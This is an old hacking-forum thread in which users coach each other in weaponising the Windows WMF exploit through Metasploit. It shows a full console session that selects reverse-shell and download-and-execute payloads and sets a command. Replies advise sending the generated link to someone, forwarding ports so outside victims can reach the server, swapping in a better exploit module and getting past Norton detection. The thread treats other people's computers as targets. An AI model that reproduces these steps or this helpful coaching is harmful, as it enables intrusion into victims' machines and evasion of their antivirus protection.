[yking90]

guys, i'm still learning, is there any generator available? something like an image and exe file binder types that will generate the wmf file and they you can upload it onto a server and give someone the link?

any help will be greatly appreciated.

thanks

[stay]

yking90, on Jan 11 2006, 07:07 AM, said:

guys, i'm still learning, is there any generator available? something like an image and exe file binder types that will generate the wmf file and they you can upload it onto a server and give someone the link?

any help will be greatly appreciated.

thanks

try using metasploit, save the "target" (the wmf file) using your browser, a downloadmanager or whatever and you have your wmf file - should be working. feedback appreciated.

[yking90]

stay, on Jan 11 2006, 11:57 PM, said:

try using metasploit, save the "target" (the wmf file) using your browser, a downloadmanager or whatever and you have your wmf file - should be working. feedback appreciated.

Thanks stay. I tried the tut posted by txR with the following result:
---------------------------

Quote

+ -- --=[ msfconsole v2.5 [113 exploits - 75 payloads]msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > show TARGETS

Supported Exploit Targets
=========================

0 Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile > set TARGET 0
TARGET -> 0
msf ie_xp_pfv_metafile > show payloads

Metasploit Framework Usable Payloads
====================================

win32_downloadexec Windows Executable Download and Execute
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payl
oad
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Paylo
ad
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_exec
PAYLOAD -> win32_exec
msf ie_xp_pfv_metafile(win32_exec) > set CMD calc.exe
CMD -> calc.exe
msf ie_xp_pfv_metafile(win32_exec) > check
[*] No check has been implemented for this module
msf ie_xp_pfv_metafile(win32_exec) > exploit
[*] Waiting for connections to http://192.168.38.78:8080/

The problem is, it just keeps waiting for connections there? What next?

[toe]

Quote

The problem is, it just keeps waiting for connections there? What next?

um lol. You send the link that it gives you to someone. If its a 192.168.*.* it will be your lan ip so people outside your lan won't be able to connect to it unless you have forwarded the port.

-toe

[yking90]

toe, on Jan 12 2006, 01:40 PM, said:

Quote

The problem is, it just keeps waiting for connections there? What next?

um lol. You send the link that it gives you to someone. If its a 192.168.*.* it will be your lan ip so people outside your lan won't be able to connect to it unless you have forwarded the port.

-toe

Damn yeah... (duhhh) figured taht when i clicked on my link on my post itself :blink:

nevertheless, it popped up asking me to save a .tiff file?!

anyways, then i tried the other payload, win32_downloadexec, set the url to an exe file on my websever (uploaded notepad.exe)... again, when i executed the exploit, went to my "192...." url, it popped up to save a .tiff file. nevertheless i saved it and opened it with Windows Picture and Fax viewr... nothing happend at all... ideally it should have downloaded that exe and executed it right (in this case, shown me a notepad)???

:unsure:

[pita]

no the shellcode in win32_downloadexec dont show anything on the screen, but u can see that there is a process named a.exe that started

[yking90]

thanks guys... to everyone who has actively helped.

i replaced the metasploit's default exploit by this one: http://www.frsirt.co...metafile.pm.php

now it seems to work correctly. but now nortan immediately rings an alarm everytime i test the exploit! :blink:

what next to make this undetected? :unsure:

thank you all again :)

[huyremy]

pita, on Jan 12 2006, 12:37 PM, said:

no the shellcode in win32_downloadexec dont show anything on the screen, but u can see that there is a process named a.exe that started

yes, That file location is C:\windows\system32\a.exe
But It's seem not work well. I test in my PC and this is the error I get :
The NTVDM CPU has encointered and illegal instruction.
CS:0594 IP:0184 OP:63 74 69 76 65 Choose 'Close' to terminate the application
I think may be have something wrong here. Please tell me the way to resolve that problem.
Thanks everybody

[zhaowei_hn]

mrgoolie, on Jan 5 2006, 02:47 PM, said:

alright, i tried with the port 1234 incoming port and then my internal port 8080
and it works, so i think maybe my provider blocks the port 8080, i dont know
so when a friend of me go to http://xxx.xxx.xxx.xxx:1234/test.wmf
it works, but his norton finds it:( and when he disables his norton, calc.exe doenst start up.

Well , i think ur problem here is you 're using Internal IP Address behind a router , when you use NAT to translate address and forward port from external IP to your computer .. you a complete at the first part of this exploit .. but the second part is ...error ^.^

The first part : Metasploit framework listen at it's port ( default is 8080 ) and waiting for victim connect to receive WMF exploit .
- When the victim connect to your external IP , the NAT at your router translate address to your computer and excuted download WMF file at victim computer .

The secondpart : The WMF file redirect user to your server again to excuted exploit payload at http://xxx.xxx.xxx.x...om_string).tiff , but the problem here is the xxx.xxx.xxx.xxx IP is local Internal IP :P so that victim cannot receive this file throught NAT . If you are using external IP as your LHOST , it can't be done because you are stay in Internal Local Area Network ^^

Solution : you can using dedicated server as ur metasploit server . or you can define a litte in metasploit exploit file , i don't say here because some security reason ... you can private email me at : zhaowei_hn@yahoo.com for answer ...

Best regard ... :rolleyes:

Now i have small question , i can't done when using special character like \ , > with win32_exec payload CMD , when i using some command like "echo asdad > C:/test.txt" , or "mkdir C:\\AAAAA" , i am using double slash because shell special character rule , but still doesn't work .... Did I do wrong smt ???

[aisketui]

tq.. i also now know how to use metasploit.. emm with web interface.. woww.. an aeasy tool for newbies like me

[parker2520]

where are you getting the Windows Executable Download and Execute payload for metasploit?

[LittleHacker]

just update your metasploit

msfupdate -uxf